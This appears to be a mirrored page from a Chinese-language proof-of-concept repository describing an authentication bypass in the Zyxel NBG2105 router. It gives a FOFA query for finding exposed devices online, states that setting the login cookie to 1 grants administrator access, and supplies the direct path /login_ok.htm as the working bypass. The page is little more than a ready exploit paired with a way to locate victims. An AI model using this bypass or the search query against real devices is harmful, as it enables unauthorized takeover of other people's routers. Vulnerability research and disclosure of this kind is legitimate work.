admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-06 02:46:33 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/Zyxel(合勤)/ZyxelNBG2105身份验证绕过.md

27 lines
758 B
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# Zyxel NBG2105身份验证绕过
# 一、漏洞简介
在Zyxel NBG2105 V1.00AAGU.2C0设备上将登录cookie设置为1可提供管理员访问权限。
# 二、影响版本
+ Zyxel NBG2105
# 三、资产测绘
+ fofa`app="ZyXEL-NBG2105"`
+ 特征
![1696166434348-7921a2e3-c0d4-41ac-8c65-ea4a29f88c1b.png](./img/8b_DE99WV4FLOPh1/1696166434348-7921a2e3-c0d4-41ac-8c65-ea4a29f88c1b-935700.png)
# 四、漏洞复现
直接访问如下poc即可绕过身份验证进入后台
```plain
/login_ok.htm
```
![1696166524962-f85cc736-9d74-4e94-a204-90dfd7dc8829.png](./img/8b_DE99WV4FLOPh1/1696166524962-f85cc736-9d74-4e94-a204-90dfd7dc8829-508453.png)
> 更新: 2024-02-29 23:57:14
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ofagy15qnxr8eg9f>
Reference in New Issue Copy Permalink